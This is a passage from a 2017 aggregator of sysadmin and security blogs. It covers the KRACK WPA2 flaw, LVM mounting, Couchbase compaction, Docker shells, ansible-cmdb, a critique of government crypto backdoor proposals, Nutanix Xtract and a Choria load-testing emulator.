And of course, the final problem is implementers. One of the truly terrible things about KRACK is that implementers of the WPA supplicant (particularly on Linux) managed to somehow make Lemon Pledge out of lemons. On Android 6 in particular, replaying message #3 actually sets an all-zero key. There’s an internal logic behind why this happens, but Oy Vey. Someone actually needs to look at this stuff.

What about the security proof?

The fascinating thing about the 802.11i handshake is that despite all of the roadblocks IEEE has thrown in people’s way, it (the handshake, at least) has been formally analyzed. At least, for some definition of the term.

(This isn’t me throwing shade — it’s a factual statement. In formal analysis, definitions really, really matter!)

A paper by He, Sundararajan, Datta, Derek and Mitchell (from 2005!) looked at the 802.11i handshake and tried to determine its security properties. What they determined is that yes, indeed, it did produce a secret and strong key, even when an attacker could tamper with and replay messages (under various assumptions). This is good, important work. The proof is hard to understand, but this is par for the course. It seems to be correct.

Representation of the 4-way handshake from the paper by He et al. Yes, I know you’re like “what?“. But that’s why people who do formal verification of protocols don’t have many friends.

Even better, there are other security proofs showing that — provided the nonces are never repeated — encryption modes like CCM and GCM are highly secure. This means that given a secure key, it should be possible to encrypt safely.

So what went wrong?

The critical problem is that while people looked closely at the two components — handshake and encryption protocol — in isolation, apparently nobody looked closely at the two components as they were connected together. I’m pretty sure there’s an entire geek meme about this.

Two unit tests, 0 integration tests, thanks Twitter.

Of course, the reason nobody looked closely at this stuff is that doing so is just plain hard. Protocols have an exponential number of possible cases to analyze, and we’re just about at the limit of the complexity of protocols that human beings can truly reason about, or that peer-reviewers can verify. The more pieces you add to the mix, the worse this problem gets.

In the end we all know that the answer is for humans to stop doing this work. We need machine-assisted verification of protocols, preferably tied to the actual source code that implements them. This would ensure that the protocol actually does what it says, and that implementers don’t further screw it up, thus invalidating the security proof.

This needs to be done urgently, but we’re so early in the process of figuring out how to do it that it’s not clear what it will take to make this stuff go live. All in all, this is an area that could use a lot more work. I hope I live to see it.

===

* Update: An early version of this post suggested that the attacker would replay the third message. This can indeed happen, and it does happen in some of the more sophisticated attacks. But primarily, the paper describes forcing the AP to resend it by blocking the acknowledgement from being received at the AP. Thanks to Nikita Borisov and Kyle Birkeland for the fix!


by Matthew Green at October 16, 2017 01:27 PM

ma.ttias.be

KRACK Attacks: Breaking WPA2

The post KRACK Attacks: Breaking WPA2 appeared first on ma.ttias.be.

Good thing we have protocols like HTTPS, SSH & STARTTLS.

Basically, assume every WiFi is an unencrypted transport layer.

We discovered serious weaknesses in WPA2, a protocol that secures all modern protected Wi-Fi networks. An attacker within range of a victim can exploit these weaknesses using key reinstallation attacks (KRACKs). Concretely, attackers can use this novel attack technique to read information that was previously assumed to be safely encrypted. This can be abused to steal sensitive information such as credit card numbers, passwords, chat messages, emails, photos, and so on. The attack works against all modern protected Wi-Fi networks.

Source: KRACK Attacks: Breaking WPA2


by Mattias Geniar at October 16, 2017 09:17 AM

October 15, 2017

LZone - Sysadmin

HowTo Mount LVM Partitions

Find out which LVM partitions you have by running
lvdisplay
and mount the one you need with
mount /dev/vg0/vol1 /mnt
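If the volume group doesn't show up (for example right after attaching a disk from another machine), the group may simply be inactive. Assuming the example names above (vg0/vol1), something like this should help:
vgscan
vgchange -ay vg0
lvdisplay
mount /dev/vg0/vol1 /mnt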

October 15, 2017 05:39 PM

Is there hope when your Couchbase cluster is stuck in compacting buckets?

Well to be anticlimactic: no.

Scope

This seems to be at least a Couchbase 3.x problem; so far I haven't experienced it with Couchbase 4. For both versions I can only speak for the so-called community edition.

As for the frequency: Couchbase 3 getting stuck on bucket compacting is probabilistic. In the setups I've run so far it happens about every half year, but this might be load-dependent: I've never had the issue on some "smaller" clusters, so I suspect it is.

The Symptoms

If you do not monitor explicitly for the compacting status, you will probably notice it when the disks of some nodes run full. When compacting no longer works, Couchbase's disk fragmentation keeps growing and finally fills your disks.

If you look in the admin GUI you will see a constant "Compacting..." indicator in the top right. In normal operation compacting never takes more than a few minutes to finish (again depending on your usage).
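To monitor the compacting status explicitly instead of waiting for full disks, the REST API is an option. If I remember the API correctly (endpoint path should be right; credentials and host below are examples), the cluster task list reports running compactions, so you can alert on one that never finishes:

curl -s -u Administrator:password http://localhost:8091/pools/default/tasks

Look for entries with "type": "bucket_compaction" and a "progress" value that stops changing.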

Things that do not work...

  • Removing nodes: in this cluster state you cannot remove nodes anymore. The compacting operation seems to lock the cluster, so disconnecting the nodes with full disks won't work and won't help either.
  • Restarting the cluster: whether you reboot, restart all instances in sequence, or take the entire cluster down and restart it, the compacting issue stays persistent (see root cause below).
  • Removing load: also doesn't help. The cluster doesn't recover even when it receives no requests anymore.

What does help...

  • Reinstall your cluster: Yeah!
  • Stopping traffic + flushing buckets: If you can afford the downtime / cold cache, stop all traffic, flush the affected buckets and re-enable traffic.

The root cause

What actually happens is a data-structure corruption from which Couchbase 3 does not recover. This is also the reason why flushing the buckets helps.

There are several bug reports against Couchbase 2, 3 and 4 about compacting getting stuck for different reasons. In general, Couchbase is not a very stable product in this regard...

October 15, 2017 04:25 PM

ma.ttias.be

Get shell in running Docker container

The post Get shell in running Docker container appeared first on ma.ttias.be.

This has saved me more times than I can count, having the ability to debug a running container the way you would in a "normal" VM.

First, see which containers are running;

$ docker ps
CONTAINER ID        IMAGE               COMMAND                  [...] NAMES
925cc10d55df        66cc85c3f275        "gitlab-runner-ser..."   [...] runner-f500bed1-project-3888560-concurrent-0-mysql-0-wait-for-service
0ab431ea0bcf        3e3878acd190        "docker-entrypoint..."   [...] runner-f500bed1-project-3888560-concurrent-0-mysql-0
4d9de6c0fba1        nginx:alpine        "nginx -g 'daemon ..."   [...] nginx-container

To get a shell (Bash) on a container of choice, run this;

$ docker exec -i -t nginx-container /bin/bash

The nginx-container argument determines which container you want to enter; it's the name in the last column of the docker ps output.

Alternatively, use the container ID;

$ docker exec -i -t 4d9de6c0fba1 /bin/bash
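Note that minimal images often ship without Bash; the nginx:alpine container from the docker ps output above is a likely example. In that case, fall back to plain sh;

$ docker exec -i -t nginx-container /bin/sh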

Don't use docker attach: it connects you to the container's main process, so if the initial command started in the container is something like MongoDB or Redis and you detach carelessly (e.g. with Ctrl-C), the instance will be killed.


by Mattias Geniar at October 15, 2017 09:40 AM

October 14, 2017

Electricmonk.nl

Ansible-cmdb v1.23: Generate a host overview of Ansible facts.

I've just released ansible-cmdb v1.23. Ansible-cmdb takes the output of Ansible's fact gathering and converts it into a static HTML overview page containing system configuration information. It supports multiple templates (fancy html, txt, markdown, json and sql) and extending information gathered by Ansible with custom data.
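If I recall the README correctly, basic usage is to let Ansible dump its facts into a directory and then feed that directory to ansible-cmdb (directory name and inventory target here are examples):

$ mkdir out
$ ansible -m setup --tree out/ all
$ ansible-cmdb out/ > overview.html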

This release includes the following changes:

  • group_vars are now parsed.
  • Sub directories in host_vars are now parsed.
  • Addition of a -q/--quiet switch to suppress warnings.
  • Minor bugfixes and additions.

As always, packages are available for Debian, Ubuntu, Redhat, Centos and other systems. Get the new release from the Github releases page.

by admin at October 14, 2017 09:33 AM

October 13, 2017

Errata Security

"Responsible encryption" fallacies

Deputy Attorney General Rod Rosenstein gave a speech recently calling for "Responsible Encryption" (aka. "Crypto Backdoors"). It's full of dangerous ideas that need to be debunked.

The importance of law enforcement

The first third of the speech talks about the importance of law enforcement, as if it's the only thing standing between us and chaos. It cites the 2016 Mirai attacks as an example of the chaos that will only get worse without stricter law enforcement.

But the Mirai case demonstrated the opposite: how law enforcement is not needed. They made no arrests in the case. A year later, they still don't have a clue who did it.

Conversely, we technologists have fixed the major infrastructure issues. Specifically, those affected by the DNS outage have moved to multiple DNS providers, including high-capacity providers like Google and Amazon who can handle such large attacks easily.

In other words, we the people fixed the major Mirai problem, and law-enforcement didn't.

Moreover, instead of being a solution to cyber threats, law enforcement has become a threat itself. The DNC didn't have the FBI investigate the attacks from Russia, likely because they didn't want the FBI reading all their files and finding wrongdoing by the DNC. It's not that they actually did anything wrong; it's more like that famous quote from Richelieu: "Give me six words written by the most honest of men and I'll find something to hang him by". Give all your internal emails to the FBI and I'm certain they'll find something to hang you by, if they want.

Or consider the case of Andrew Auernheimer. He found AT&T's website made public user accounts of the first iPad, so he copied some down and posted them to a news site. AT&T had denied the problem, so making the problem public was the only way to force them to fix it. Such access to the website was legal, because AT&T had made the data public. However, prosecutors disagreed. In order to protect the powerful, they twisted and perverted the law to put Auernheimer in jail.

It's not that law enforcement is bad, it's that it's not the unalloyed good Rosenstein imagines. When law enforcement becomes the thing Rosenstein describes, it means we live in a police state.

Where law enforcement can't go

Rosenstein repeats the frequent claim in the encryption debate:
Our society has never had a system where evidence of criminal wrongdoing was totally impervious to detection
Of course our society has places "impervious to detection", protected by both legal and natural barriers.

An example of a legal barrier is how spouses can't be forced to testify against each other. This barrier is impervious.

A better example, though, is how so much of government, intelligence, the military, and law enforcement itself is impervious. If prosecutors could gather evidence everywhere, then why isn't Rosenstein prosecuting those guilty of CIA torture?

Oh, you say, government is a special exception. If that were the case, then why did Rosenstein dedicate a precious third of his speech to discussing the "rule of law" and how it applies to everyone, "protecting people from abuse by the government"? It obviously doesn't: there's one rule for government and a different rule for the people, and the rule for government means there are lots of places law enforcement can't go to gather evidence.

Likewise, the crypto backdoor Rosenstein is demanding for citizens doesn't apply to the President, Congress, the NSA, the Army, or Rosenstein himself.

Then there are the natural barriers. The police can't read your mind. They can only get the evidence that is there, like partial fingerprints, which are far less reliable than full fingerprints. They can't go backwards in time.

I mention this because encryption is a natural barrier. It's their job to overcome this barrier if they can, to crack crypto and so forth. It's not our job to do it for them.

It's like the camera that increasingly comes with TVs for video conferencing, or the microphone on Alexa-style devices that are always recording. This suddenly creates evidence that the police want our help in gathering, such as having the camera turned on all the time, recording to disk, in case the police later get a warrant to peer backward in time at what happened in our living rooms. The "nothing is impervious" argument applies here as well, and it's equally bogus here. By not helping the police, by not recording our activities, we aren't somehow breaking some long-standing tradition.

And this is the scary part. It's not that we are breaking some ancient tradition that there's no place the police can't go (with a warrant). Instead, crypto backdoors break the tradition that never before have I been forced to help the police eavesdrop on me, even before I'm a suspect, even before any crime has been committed. Sure, laws like CALEA force the phone companies to help the police against wrongdoers -- but here Rosenstein is insisting I help the police against myself.

Balance between privacy and public safety

Rosenstein repeats the frequent claim that encryption upsets the balance between privacy/safety:
Warrant-proof encryption defeats the constitutional balance by elevating privacy above public safety.
This is laughable, because technology has swung the balance alarmingly in favor of law enforcement. Far from "Going Dark" as his side claims, the problem we are confronted with is "Going Light", where the police state monitors our every action.

You are surrounded by recording devices. If you walk down the street in town, outdoor surveillance cameras feed police facial recognition systems. If you drive, automated license plate readers can track your route. If you make a phone call or use a credit card, the police get a record of the transaction. If you stay in a hotel, they demand your ID, for law enforcement purposes.

And that's their stuff, which is nothing compared to your stuff. You are never far from a recording device you own, such as your mobile phone, TV, Alexa/Siri/OkGoogle device, laptop. Modern cars from the last few years increasingly have always-on cell connections and data recorders that record your every action (and location).

Even if you hike out into the country, when you get back, the FBI can subpoena your GPS device to track down your hidden weapon's cache, or grab the photos from your camera.

And this is all offline. So much of what we do is now online. Of the photographs you own, fewer than 1% are printed out, the rest are on your computer or backed up to the cloud.

Your phone is also a GPS recorder of your exact position all the time, which, if the government wins the Carpenter case, the police can grab without a warrant. Tagging all citizens with a recording device of their position is not "balance" but the premise for a novel more dystopian than 1984.

If suspected of a crime, which would you rather the police searched? Your person, houses, papers, and physical effects? Or your mobile phone, computer, email, and online/cloud accounts?

The balance of privacy and safety has swung so far in favor of law enforcement that rather than debating whether they should have crypto backdoors, we should be debating how to add more privacy protections.

"But it's not conclusive"

Rosenstein defends against the "going light" ("Golden Age of Surveillance") argument by pointing out that the data isn't always enough for conviction. Nothing gives a conviction better than a person's own words admitting to the crime, captured by surveillance. This other data, while copious, often fails to convince a jury beyond a reasonable doubt.

This is nonsense. Police got along well enough before the digital age, before such widespread messaging. They solved terrorist and child abduction cases just fine in the 1980s. Sure, somebody's GPS location isn't by itself enough -- until you go there and find all the buried bodies, which leads to a conviction. "Going dark" imagines that somehow, the evidence they've been gathering for centuries is going away. It isn't. It's still here, and matches up with even more digital evidence.

Conversely, a person's own words are not as conclusive as you think. There's always missing context. We quickly get back to the Richelieu "six words" problem, where captured communications are twisted to convict people, with defense lawyers trying to untwist them.

Rosenstein's claim may be true, that a lot of criminals will go free because the other electronic data isn't convincing enough. But I'd need to see that claim backed up with hard studies, not thrown out for emotional impact.

Terrorists and child molesters

You can always tell the lack of seriousness of law enforcement when they bring up terrorists and child molesters.

To be fair, sometimes we do need to talk about terrorists. There are things unique to terrorism where we may need to give government explicit powers to address those unique concerns. For example, the NSA buys mobile phone 0day exploits in order to hack terrorist leaders in tribal areas. This is a good thing.

But when terrorists use encryption the same way everyone else does, then it's not a unique reason to sacrifice our freedoms to give the police extra powers. Either it's a good idea for all crimes or for no crimes -- there's nothing particular about terrorism that makes it an exceptional crime. Dead people are dead. Any rational view of the problem relegates terrorism to being a minor problem. More citizens have died since September 11, 2001 from their own furniture than from terrorism. According to studies, the hot water from your tap is more of a threat to you than terrorists.

Yes, government should do what they can to protect us from terrorists, but no, it's not so bad of a threat that it requires the imposition of a military/police state. When people use terrorism to justify their actions, it's because they're trying to form a military/police state.

A similar argument works with child porn. Here's the thing: the pervs aren't exchanging child porn using the services Rosenstein wants to backdoor, like Apple's Facetime or Facebook's WhatsApp. Instead, they are exchanging child porn using custom services they build themselves.

Again, I'm (mostly) on the side of the FBI. I support their idea of buying 0day exploits in order to hack the web browsers of visitors to the secret "PlayPen" site. This is something that's narrow to this problem and doesn't endanger the innocent. On the other hand, their calls for crypto backdoors endanger the innocent while doing effectively nothing to address child porn.

Terrorists and child molesters are a clichéd, non-serious excuse to appeal to our emotions to give up our rights. We should not give in to such emotions.

Definition of "backdoor"

Rosenstein claims that we shouldn't call backdoors "backdoors":
No one calls any of those functions [like key recovery] a “back door.”  In fact, those capabilities are marketed and sought out by many users.
He's partly right in that we rarely refer to PGP's key escrow feature as a "backdoor".

But that's because the term "backdoor" refers less to how it's done and more to who is doing it. If I set up a recovery password with Apple, I'm the one doing it to myself, so we don't call it a backdoor. If it's the police, spies, hackers, or criminals, then we call it a "backdoor" -- even it's identical technology.

Wikipedia uses the key escrow feature of the 1990s Clipper Chip as a prime example of what everyone means by "backdoor". By "no one", Rosenstein is including Wikipedia, which is obviously incorrect.

Though in truth, it's not going to be the same technology. The needs of law enforcement are different than my personal key escrow/backup needs. In particular, there are unsolvable problems, such as a backdoor that works for the "legitimate" law enforcement in the United States but not for the "illegitimate" police states like Russia and China.

I feel for Rosenstein, because the term "backdoor" does have a pejorative connotation, which can be considered unfair. But that's like saying the word "murder" is a pejorative term for killing people, or "torture" is a pejorative term for torture. The bad connotation exists because we don't like government surveillance. I mean, honestly calling this feature "government surveillance feature" is likewise pejorative, and likewise exactly what it is that we are talking about.

Providers

Rosenstein focuses his arguments on "providers", like Snapchat or Apple. But this isn't the question.

The question is whether a "provider" like Telegram, a Russian company beyond US law, provides this feature. Or, by extension, whether individuals should be free to install whatever software they want, regardless of provider.

Telegram is a Russian company that provides end-to-end encryption. Anybody can download their software in order to communicate so that American law enforcement can't eavesdrop. They aren't going to put in a backdoor for the U.S. If we succeed in putting backdoors in Apple and WhatsApp, all this means is that criminals are going to install Telegram.

If, for some reason, the US is able to convince all such providers (including Telegram) to install a backdoor, it still doesn't solve the problem, as users can just build their own end-to-end encryption app that has no provider. It's like email: some use major providers like GMail, others set up their own email server.

Ultimately, this means that any law mandating "crypto backdoors" is going to target users not providers. Rosenstein tries to make a comparison with what plain-old telephone companies have to do under old laws like CALEA, but that's not what's happening here. Instead, for such rules to have any effect, they have to punish users for what they install, not providers.

This continues the argument I made above. Government backdoors are not something that forces Internet services to eavesdrop on us -- they force us to help the government spy on ourselves.

Rosenstein tries to address this by pointing out that it's still a win if major providers like Apple and Facebook are forced to add backdoors, because they are the most popular, and some terrorists/criminals won't move to alternate platforms. This is false. People with good intentions, who are unfairly targeted by a police state, the ones where police abuse is rampant, are the ones who use the backdoored products. Those with bad intentions, who know they are guilty, will move to the safe products. Indeed, Telegram is already popular among terrorists because they believe American services are already all backdoored.

Rosenstein is essentially demanding the innocent get backdoored while the guilty don't. This seems backwards. This is backwards.

Apple is morally weak

The reason I'm writing this post is because Rosenstein makes a few claims that cannot be ignored. One of them is how he describes Apple's response to government insistence on weakening encryption doing the opposite, strengthening encryption. He reasons this happens because:
Of course they [Apple] do. They are in the business of selling products and making money. 
We [the DoJ] use a different measure of success. We are in the business of preventing crime and saving lives. 
He swells with importance. His condescending tone ennobles himself while debasing others. But this isn't how things work. He's not some white knight above the peasantry, protecting us. He's a beat cop, a civil servant, who serves us.

A better phrasing would have been:
They are in the business of giving customers what they want.
We are in the business of giving voters what they want.
Both sides are doing the same thing: giving people what they want. Yes, voters want safety, but they also want privacy. Rosenstein imagines that he's free to ignore our demands for privacy as long as he's fulfilling his duty to protect us. He has explicitly rejected what people want: "we use a different measure of success". He imagines it's his job to tell us where the balance between privacy and safety lies. That's not his job, that's our job. We, the people (and our representatives), make that decision, and his job is to do what he's told. His measure of success is how well he fulfills our wishes, not how well he satisfies his imagined criteria.

That's why those of us on this side of the debate doubt the good intentions of those like Rosenstein. He criticizes Apple for wanting to protect our rights and freedoms, and declares that he measures success differently.

They are willing to be vile

Rosenstein makes this argument:
Companies are willing to make accommodations when required by the government. Recent media reports suggest that a major American technology company developed a tool to suppress online posts in certain geographic areas in order to embrace a foreign government’s censorship policies. 
Let me translate this for you:
Companies are willing to acquiesce to vile requests made by police-states. Therefore, they should acquiesce to our vile police-state requests.
What Rosenstein is admitting here is that his requests are those of a police-state.

Constitutional Rights

Rosenstein says:
There is no constitutional right to sell warrant-proof encryption.
Maybe. It's something the courts will have to decide. There are many 1st, 2nd, 3rd, 4th, and 5th Amendment issues here.

The reason we have the Bill of Rights is because of the abuses of the British Government. For example, they quartered troops in our homes, as a way of punishing us, and as a way of forcing us to help in our own oppression. The troops weren't there to defend us against the French, but to defend us against ourselves, to shoot us if we got out of line.

And that's what crypto backdoors do. We are forced to be agents of our own oppression. The principles Rosenstein enumerates apply to a wide range of additional surveillance as well. With little change, his speech could equally argue that the constant TV surveillance from 1984 should be made law.

Let's go back and look at Apple. It is not some base company exploiting consumers for profit. Apple doesn't have guns; it cannot make people buy its product. If Apple doesn't provide customers what they want, then customers vote with their feet and go buy an Android phone. Apple isn't providing encryption/security in order to make a profit -- it's giving customers what they want in order to stay in business.

Conversely, if we citizens don't like what the government does, tough luck, they've got the guns to enforce their edicts. We can't easily vote with our feet and walk to another country. A "democracy" is far less democratic than capitalism. Apple is a minority, selling phones to 45% of the population, and that's fine, the minority get the phones they want. In a Democracy, where citizens vote on the issue, those 45% are screwed, as the 55% impose their will unwanted onto the remainder.

That's why we have the Bill of Rights: to protect the 49% against abuse by the 51%. Regardless of whether the Supreme Court finds such a right in the current Constitution, it is the sort of right that ought to exist regardless of what the Constitution says.

Obliged to speak the truth

Here is another part of his speech that I feel cannot be ignored. We have to discuss this:
Those of us who swear to protect the rule of law have a different motivation.  We are obliged to speak the truth.
The truth is that “going dark” threatens to disable law enforcement and enable criminals and terrorists to operate with impunity.
This is not true. Sure, he's obliged to tell the absolute truth in court. He's also obliged to be truthful in general about facts in his personal life, such as not lying on his tax return (the sort of thing that can get lawyers disbarred).

But he's not obliged to tell his spouse his honest opinion about whether that new outfit makes them look fat. Likewise, Rosenstein knows his opinion on public policy doesn't fall into this category. He can say with impunity either that global warming doesn't exist or that it'll cause a biblical deluge within 5 years. Both are factually untrue, but it's not going to get him fired.

And this particular claim is also exaggerated bunk. While everyone agrees encryption makes law enforcement's job harder than with backdoors, nobody honestly believes it can "disable" law enforcement. While everyone agrees that encryption helps terrorists, nobody believes it can enable them to act with "impunity".

I feel bad here. It's a terrible thing to question your opponent's character this way. But Rosenstein made this unavoidable when he clearly, with no ambiguity, put his integrity as Deputy Attorney General on the line behind the statement that "going dark threatens to disable law enforcement and enable criminals and terrorists to operate with impunity". I feel it's a bald-faced lie, but you don't need to take my word for it. Read his own words yourself and judge his integrity.

Conclusion

Rosenstein's speech includes repeated references to ideas like "oath", "honor", and "duty". It reminds me of Col. Jessup's speech in the movie "A Few Good Men".

If you'll recall, it was a rousing speech: "you want me on that wall" and "you use words like honor as a punchline". Of course, since he was violating his oath and sending two privates to death row in order to avoid being held accountable, it was Jessup himself who was crapping on the concepts of "honor", "oath", and "duty".

And so is Rosenstein. He imagines himself on that wall, doing admittedly terrible things justified by his duty to protect citizens. He imagines that it's he who is honorable while the rest of us are not, even as he utters bald-faced lies to further his own power and authority.

We activists oppose crypto backdoors not because we lack honor, or because we are criminals, or because we support terrorists and child molesters. It's because we value privacy and fear government officials who get corrupted by power. It's not that we fear Trump becoming a dictator; it's that we fear bureaucrats at Rosenstein's level becoming drunk on authority -- which Rosenstein demonstrably is. His speech is a long train of corrupt ideas pursuing the same object of despotism -- a despotism we oppose.

In other words, we oppose crypto backdoors because they are not a tool of law enforcement, but a tool of despotism.

by Robert Graham (noreply@blogger.com) at October 13, 2017 01:20 AM

October 11, 2017

Steve Kemp's Blog

A busy week or two

It feels like the past week or two has been very busy, and so I'm looking forward to my "holiday" next month.

I'm not really having a holiday of course, my wife is slowly returning to work, so I'll be taking a month of paternity leave, taking sole care of Oiva for the month of November. He's still a little angel, and now that he's reached 10 months old he's starting to get much more mobile - he's on the verge of walking, but not quite there yet. Mostly that means he wants you to hold his hands so that he can stand up, swaying back and forth before the inevitable collapse.

Beyond spending most of my evenings taking care of him, from the moment I return from work to his bedtime (around 7:30PM), I've made the Debian Administration website both read-only and much simpler. In the past that site was powered by a lot of servers; I think around 11. Now it has only a small number of machines, which should slowly decrease.

I've ripped out the database host, the redis host, the events-server, the planet-machine, the email-box, etc. Now we have a much simpler setup:

  • Front-end machine
    • Directly serves the code site
    • Directly serves the SSL site which exists solely for Let's Encrypt
    • Runs HAProxy to route the rest of the requests to the cluster.
  • 4 x Apache servers
    • Each one has a (read-only) MySQL database on it for the content.
      • In case of future-compromise I removed all user passwords, and scrambled the email-addresses.
      • I don't think there's a huge risk, but better safe than sorry.
    • Each one runs the web-application.
      • Which now caches each generated page to /tmp/x/x/x/x/$hash if it doesn't exist.
      • If the request is cached it is served from that cache rather than dynamically.
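The caching scheme in that last bullet can be sketched as follows (a hypothetical Python sketch; the post doesn't show the web application's code, and the hash function and four-level sharding are assumptions based on the /tmp/x/x/x/x/$hash path):

```python
import hashlib
import os

CACHE_ROOT = "/tmp"  # assumed cache root from the post

def cache_path(request_path):
    """Map a request path to a sharded cache file like /tmp/a/b/c/d/<hash>."""
    h = hashlib.sha1(request_path.encode("utf-8")).hexdigest()
    # Shard on the first four hex characters to keep any one directory small.
    return os.path.join(CACHE_ROOT, h[0], h[1], h[2], h[3], h)

def serve(request_path, render):
    """Serve from cache if the page exists, otherwise render and cache it."""
    path = cache_path(request_path)
    if os.path.exists(path):
        with open(path) as f:
            return f.read()
    page = render(request_path)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as f:
        f.write(page)
    return page
```

Since pages are served straight from the filesystem once cached, the read-only site needs no database round-trips on repeat requests.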

Finally, although I'm slowly making progress with "radio stuff", I've knocked up a simple hack which uses an ultrasonic sensor to determine whether I'm sat in front of my (home) PC. If I am, everything is good. If I'm absent, the music is stopped and the screen locked. Kinda neat.

(Simple ESP8266 device wired to the sensor. When the state changes a message is posted to Mosquitto, where a listener reacts to the change(s).)
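The listener's reaction boils down to a tiny state machine. A hypothetical Python sketch (the MQTT subscription and the actual music/screen commands are stubbed out, and the "return to desk" actions are my assumption, since the post only describes the absent case):

```python
def react(was_present, is_present):
    """Decide which actions to fire when a new presence reading arrives.

    Actions fire only on a state change, matching the post's
    "when the state changes a message is posted" behaviour.
    """
    if was_present == is_present:
        return []                                  # no change: do nothing
    if is_present:
        return ["resume_music", "unlock_screen"]   # assumed: undo on return
    return ["stop_music", "lock_screen"]           # absent: as described
```

A real listener would subscribe to the Mosquitto topic, call react() on each message, and shell out once per returned action.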

Oh, that wasn't final. I've also transferred my mobile phone from DNA.fi to MoiMobile. That should complete soon; right now my phone is in limbo, active on neither service. Oops.

October 11, 2017 09:00 PM

LZone - Sysadmin

How to search Confluence for macro usage

When you want to find all pages in Confluence that embed a certain macro, you cannot simply use the search field, as it seemingly only searches the rendered content. A normal search query does not check the markup for the macro code.

To search for a certain macro, make a request like this:
https://<base url>/dosearchsite.action?cql=macro+%3D+"<macro name>"
For example, to search for the "sql-query" macro:
https://<base url>/dosearchsite.action?cql=macro+%3D+"sql-query"

October 11, 2017 02:25 PM

October 10, 2017

Sean's IT Blog

Nutanix Xtract for VMs #blogtober

One of the defining features of the Nutanix platform is simplicity.  Innovations like the Prism interface for infrastructure management and One-Click Upgrades for both the Nutanix software-defined storage platform and supported hypervisors have lowered the management burden of on-premises infrastructure.

Nutanix is now looking to bring that same level of simplicity to migrating virtual machines to a new hypervisor.  Nutanix has released a new tool today called Xtract for VMs.  This tool, which is free to all Nutanix customers, brings the same one-click simplicity that Nutanix is known for to migrating workloads from ESXi to AHV.

So how does Xtract for VMs differ from other migration tools?  First, it is an agentless migration tool.  Xtract will communicate with vCenter to get a list of VMs that are in the ESXi infrastructure, and it will build a migration plan and synchronize the VM data from ESXi to AHV.

During data synchronization and migration, Xtract will insert the AHV device drivers into the virtual machine.  It will also capture and preserve the network configuration, so the VM will not lose connectivity or require administrator intervention after the migration is complete.

By injecting the AHV drivers and preserving the network configuration during the data synchronization and cutover, Xtract is able to perform cross-hypervisor migrations with minimal downtime.  And since the original VM is not touched during the migration, rollback is as easy as shutting down the AHV VM and powering the ESXi VM back on, which significantly reduces the risk of cross-hypervisor migrations.

Analysis

The datacenter is clearly changing, and we now live in a multi-hypervisor world.  While many customers will still run VMware for their on-premises environments, there are many that are looking to reduce their spend on hypervisor products.  Xtract for VMs provides a tool to help reduce that cost while providing the simplicity that Nutanix is known for.

While Xtract is currently at version 1.0, I can see this technology being pivotal in helping customers move workloads between on-premises and cloud infrastructures.

To learn more about this new tool, you can check out the Xtract for VMs page on Nutanix’s webpage.


by seanpmassey at October 10, 2017 04:36 PM

October 09, 2017

Sarah Allen

getting started with docker

Learning about Docker this weekend… it is always hard to find resources for people who understand the concepts of VMs and containers and need to dive into something just a little bit complicated. I had been through lots of intro tutorials when Docker first arrived on the scene, and was seeking to set up a hosted dev instance for an existing open source project which already had a Docker setup.

Here’s an outline of the key concepts:

  • docker-machine: commands to create and manage VMs, whether locally or on a remote server
  • docker: commands to talk to your active VM that is already set up with docker-machine
  • docker-compose: a way to create and manage multiple containers on a docker-machine

As often happens, I see parallels between human spoken language and new technical terms, which makes sense since these are things made by and for humans. The folks who made Docker invented a kind of language for us to talk to their software.

I felt like I was learning to read in a new language, like pig-latin, where words have a prefix of docker, like some kind of honorific

They use docker- to speak to VMs locally or remotely, and docker (without a dash) is an intimate form of communication with your active VM

Writing notes here, so I remember when I pick this up again. If there are Docker experts reading this, I’d be interested to know if I got this right and if there are other patterns or naming conventions that might help fast-track my learning of this new dialect for deploying apps in this land of containers and virtual machines.

Also, if a kind and generous soul wants to help an open source project, I’ve written up my work-in-progress steps for setting up OpenOpps-platform dev instance and would appreciate any advice, and of course, would welcome a pull request.

by sarah at October 09, 2017 02:17 PM

R.I.Pienaar

The Choria Emulator

In my previous posts I discussed what goes into load testing a Choria network: what connections are made, what subscriptions are created, and so on.

From this it’s obvious the things we should be able to emulate are:

  • Connections to NATS
  • Subscriptions – which implies number of agents and sub collectives
  • Message payload sizes

To make it realistically affordable to emulate many more machines than I have, I made an emulator that can start a number of Choria daemons on a single node.

I’ve been slowly rewriting MCollective daemon side in Go which means I already had all the networking and connectors available there, so a daemon was written:

usage: choria-emulator --instances=INSTANCES [<flags>]
 
Emulator for Choria Networks
 
Flags:
      --help                 Show context-sensitive help (also try --help-long and --help-man).
      --version              Show application version.
      --name=""              Instance name prefix
  -i, --instances=INSTANCES  Number of instances to start
  -a, --agents=1             Number of emulated agents to start
      --collectives=1        Number of emulated subcollectives to create
  -c, --config=CONFIG        Choria configuration file
      --tls                  Enable TLS on the NATS connections
      --verify               Enable TLS certificate verifications on the NATS connections
      --server=SERVER ...    NATS Server pool, specify multiple times (eg one:4222)
  -p, --http-port=8080       Port to listen for /debug/vars

You can see here it takes a number of instances, agents and collectives. The instances will all respond with ${name}-${instance} on any mco ping or RPC commands. They can be discovered using the normal mco discovery – though only agent and identity filters are supported.

Every instance will be a Choria daemon with the exact same network connection and NATS subscriptions as real ones. Thus 50 000 emulated Choria daemons will put exactly the same load on your NATS brokers as normal ones would. Performance-wise, even with high concurrency the emulator does quite well – it's many orders of magnitude faster than the Ruby Choria client anyway, so it's real enough.

The agents they start are all copies of this one:

emulated0
=========
 
Choria Agent emulated by choria-emulator
 
      Author: R.I.Pienaar <rip@devco.net>
     Version: 0.0.1
     License: Apache-2.0
     Timeout: 120
   Home Page: http://choria.io
 
   Requires MCollective 2.9.0 or newer
 
ACTIONS:
========
   generate
 
   generate action:
   ----------------
       Generates random data of a given size
 
       INPUT:
           size:
              Description: Amount of text to generate
                   Prompt: Size
                     Type: integer
                 Optional: true
            Default Value: 20
 
 
       OUTPUT:
           message:
              Description: Generated Message
               Display As: Message

You can see this has a basic data generator action – you give it a desired size and it makes you a message that size. It will run as many of these as you wish, all named like emulated0 etc.
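Conceptually, the generate action just produces a payload of the requested size. A hypothetical Python sketch of the idea (the real agents are part of the Go emulator; this is only an illustration of the behaviour):

```python
import random
import string

def generate(size=20):
    """Return a random message of exactly `size` characters, mimicking
    the emulated agent's generate action (default size 20, per the DDL)."""
    return "".join(random.choice(string.ascii_letters) for _ in range(size))
```

Varying the size input is what lets the test scenarios control message payload sizes on the wire.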

